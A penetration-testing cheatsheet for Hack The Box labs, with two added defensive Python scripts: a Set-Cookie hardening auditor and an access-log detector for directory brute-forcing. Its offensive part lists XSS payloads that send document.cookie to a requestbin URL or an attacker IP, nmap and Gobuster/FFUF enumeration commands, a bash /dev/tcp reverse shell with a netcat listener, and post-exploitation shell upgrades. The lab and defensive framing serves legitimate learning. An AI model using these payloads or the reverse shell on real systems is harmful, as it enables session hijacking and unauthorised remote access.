Useful websites

  • Hackthebox
  • Arch wiki
  • Requestbin whapi
  • Analyze & bruteforce encryption
  • Other cheatsheets
  • Hacking resources
  • TL;DR

XSS

  • document.location="https://requestbin.whapi.cloud/something.php?c=" + document.cookie;

  • document.location="http://IP:1234/?c=" + document.cookie;

    ---- Hack The Box machines do not allow non-local internet connections, so catch the request on your own host with python -m http.server 1234
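The payloads above only work when the session cookie is readable from JavaScript. As an added example (not part of the original cheatsheet), this Python helper audits a Set-Cookie header the way a defender would: it parses the attributes and reports anything that leaves the cookie exposed to document.cookie, plaintext transport, or cross-site requests. The header strings and attribute checks are constructed for the example and are not taken from any real application.

```python
"""Audit Set-Cookie headers for the attributes that limit cookie theft via XSS."""
from typing import Dict, List, Union

Attrs = Dict[str, Union[str, bool]]


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Split a Set-Cookie header into name, value and lower-cased attributes.

    Flag attributes such as HttpOnly map to True; valued ones keep their value.
    """
    parts = [p.strip() for p in header.split(";") if p.strip()]
    if not parts:
        raise ValueError("empty Set-Cookie header")
    name, _, value = parts[0].partition("=")
    attrs: Attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value, "attrs": attrs}


def audit_set_cookie(header: str) -> List[str]:
    """Return a list of findings; an empty list means the cookie is hardened."""
    cookie = parse_set_cookie(header)
    attrs: Attrs = cookie["attrs"]  # type: ignore[assignment]
    findings: List[str] = []

    # Without HttpOnly the cookie is visible to document.cookie, which is
    # exactly what an XSS exfiltration payload reads.
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie")

    # Without Secure the cookie is also sent over plaintext HTTP.
    if "secure" not in attrs:
        findings.append("missing Secure: sent over unencrypted connections")

    # SameSite absent, bare, or None means the cookie rides along on
    # cross-site requests initiated from other origins.
    samesite = attrs.get("samesite")
    if samesite is None or samesite is True or str(samesite).lower() == "none":
        findings.append("SameSite missing or None: sent on cross-site requests")

    return findings


if __name__ == "__main__":
    # Constructed sample headers: a weak one and a hardened one.
    for hdr in ("session=abc123; Path=/",
                "session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax"):
        print(hdr, "->", audit_set_cookie(hdr) or "OK")
```

Run it against the Set-Cookie headers a target application actually returns (for example copied from a browser's network tab); a session cookie that produces any finding for HttpOnly is one that the cookie-stealing payloads on this page could read.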
nmap

  • nmap -sS -sC -sV IP

    ---- TCP SYN port scan (Default)

  • nmap -sT -sC -sV IP

    ---- TCP connect port scan (Default without root privilege)

  • nmap -sU -sC -sV IP

    ---- UDP port scan

  • nmap -sA -sC -sV IP

    ---- TCP ACK port scan

Web enumeration

  • gobuster dir -u http://example.com -w /path/to/wordlist.txt

    ---- Directory brute-force using Gobuster

  • ffuf -u http://example.com -H "Host: FUZZ.example.com" -w /path/to/wordlist.txt

    ---- Subdomain brute-force using FFUF
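Directory brute-forcing like the Gobuster and FFUF commands above leaves a distinctive trail in the web server's access log: one client producing many 404s for many distinct paths in a short window. As an added example (not from the original cheatsheet), this Python script parses Apache/nginx combined-format log lines and flags clients that match that pattern. The log lines, IP addresses, paths and the gobuster/3.1 User-Agent string are constructed sample data, not a capture from a real host; the thresholds are assumptions to tune per site.

```python
"""Detect directory brute-force enumeration in combined-format access logs."""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, List, Optional, Tuple

# Combined log format: ip ident user [timestamp] "METHOD path PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: 10.0.0.5 walks a wordlist of paths (all 404),
# 10.0.0.9 is an ordinary visitor with a single stray 404.
SCANNED_PATHS = ["/admin", "/backup", "/config", "/old", "/test", "/dev",
                 "/private", "/uploads", "/tmp", "/secret", "/db", "/logs"]
SAMPLE_LOG: List[str] = [
    f'10.0.0.5 - - [10/Oct/2023:13:55:{i:02d} +0000] "GET {p} HTTP/1.1" 404 153 "-" "gobuster/3.1"'
    for i, p in enumerate(SCANNED_PATHS)
] + [
    '10.0.0.9 - - [10/Oct/2023:13:55:03 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:07 +0000] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:20 +0000] "GET /about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one log line; returns None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec: Dict[str, object] = m.groupdict()
    rec["ts"] = datetime.strptime(str(rec["ts"]), "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(str(rec["status"]))
    return rec


def detect_enumeration(lines: Iterable[str], window_s: int = 60,
                       min_404: int = 10, min_distinct: int = 10) -> Dict[str, int]:
    """Return {client_ip: peak 404 count} for clients whose 404s within any
    window of window_s seconds reach min_404 hits across min_distinct paths."""
    per_ip: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            per_ip[str(rec["ip"])].append((rec["ts"], str(rec["path"])))  # type: ignore[arg-type]

    alerts: Dict[str, int] = {}
    for ip, events in per_ip.items():
        events.sort()
        start = 0
        # Sliding window over the time-ordered 404s for this client.
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            count = end - start + 1
            distinct = len({path for _, path in events[start:end + 1]})
            if count >= min_404 and distinct >= min_distinct:
                alerts[ip] = max(alerts.get(ip, 0), count)
    return alerts


if __name__ == "__main__":
    for ip, hits in detect_enumeration(SAMPLE_LOG).items():
        print(f"possible directory brute-force from {ip}: {hits} 404s in a 60 s window")
```

Feed it real log lines (for example `detect_enumeration(open("/var/log/nginx/access.log"))`) and the single noisy client stands out while an ordinary visitor with the occasional missing favicon does not. Subdomain fuzzing with a spoofed Host header, as in the FFUF command, is better caught at the virtual-host layer by logging and alerting on Host values that match no configured site.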

Reverse shell

  • nc -lvnp 9999

    ---- listen on port 9999 with netcat

  • bash -i >& /dev/tcp/IP/9999 0>&1

    ---- start an interactive bash shell with its input and output redirected to IP:9999

After getting a shell

  • sudo -l

    ---- list the allowed (and forbidden) commands for the invoking user

  • python -c 'import pty; pty.spawn("/bin/bash")'

    ---- upgrade the bare netcat shell to a proper interactive TTY

  • bash -p

    ---- spawns bash in privileged mode (does not drop the effective user id)